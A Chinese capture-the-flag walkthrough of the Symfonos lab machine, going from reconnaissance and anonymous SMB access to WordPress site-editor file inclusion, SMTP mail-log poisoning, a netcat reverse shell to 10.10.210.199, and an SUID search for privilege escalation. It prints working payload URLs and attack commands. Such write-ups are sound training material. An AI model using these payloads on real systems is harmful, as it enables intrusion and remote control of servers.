Symfonos靶场打靶记录

简介: Symfonos靶场打靶记录

0x01 信息收集阶段

1.arp-scan -l 扫描主机【IP以实际IP为准】

2.nmap扫描端口,发现smtp,http,samba服务开放

登录web

3.-L:显示服务器端所分享出来的所有资源;发现共享文件helios和anonymous

0x02 渗透测试阶段

4.指定anonymous用户以guest身份登录

ls发现存在attention.txt文件,get下载文件 查看attention.txt发现三个疑似密码epliioko qwerty baseball

5.指定helios用户登录

发现存在research.txt和todo.txt文件,下载到本地

6.查看todo.txt,发现疑似url路径

7.尝试登录url路径

修改/etc/hosts文件,添加一行解析


发现可以正常访问

8.wpscan工具扫描

因为工具需要联网,场景中不能使用。直接给出结果,扫描到存在site-editor插件,版本1.1.1


wpscan --url http://symfonos.local/h3l105/ --enumeratep,t,tt,cb,dbe,u,m

9、site-editor存在文件包含漏洞,输入payload


http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

10.通过telnet连接smtp25端口,发送php文件。

11.测试是否发送成功


http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?=/var/mail/helios&c=id

12.反弹shell


&c=nc -e /bin/bash 10.10.210.199 7777

13.攻击机监听获得shell

0x02 提权阶段

14.查找suid文件


find / -perm -u=s 2>/dev/null

15.提权

16.寻找flag文件

目录
相关文章
|
7月前
|
存储 安全 Linux
CTFHuB靶场命令执行题型过关总结
本篇博文是对自己学习rce漏洞后,因为没有进行实战练习,仅仅停留在概念上,因此做了一次靶场实战练习,来帮助自己熟悉rce漏洞的利用类型以及利用方法,写下这篇文章对此做个总结..其实关于这个练习已经过去了很久了,但我还是要那出来进行一次复习吧,对与命令执行相关的一些操作,对自己在漏洞挖掘方面能有更多的帮助,通过这次练习也对自己关于代码审计或是关于linux命令的常见命令的同意替换有了更多的了解.
|
7月前
|
数据库
个人日记系统,记录点滴小事,记录生活点点滴滴
个人日记系统,记录点滴小事,记录生活点点滴滴
47 0
|
7月前
|
SQL 关系型数据库 MySQL
【sqli靶场】第二关和第三关通关思路
【sqli靶场】第二关和第三关通关思路
90 0
新增节添加ShellCode【滴水逆向三期46作业源码】
新增节添加ShellCode【滴水逆向三期46作业源码】
pikachu靶场通关秘籍之目录遍历攻击
pikachu靶场通关秘籍之目录遍历攻击
184 0
|
存储 安全 Shell
vulntarget-i 打靶记录(下)
vulntarget-i 打靶记录
138 0
|
SQL 安全 Shell
vulntarget-h 打靶记录
vulntarget-h 打靶记录
232 0
|
安全 中间件 关系型数据库
vulntarget-i 打靶记录(上)
vulntarget-i 打靶记录
144 0
|
Windows
pikachu靶场通关秘籍之命令执行攻击
pikachu靶场通关秘籍之命令执行攻击
129 0
pikachu靶场通关秘籍之越权攻击
pikachu靶场通关秘籍之越权攻击
263 0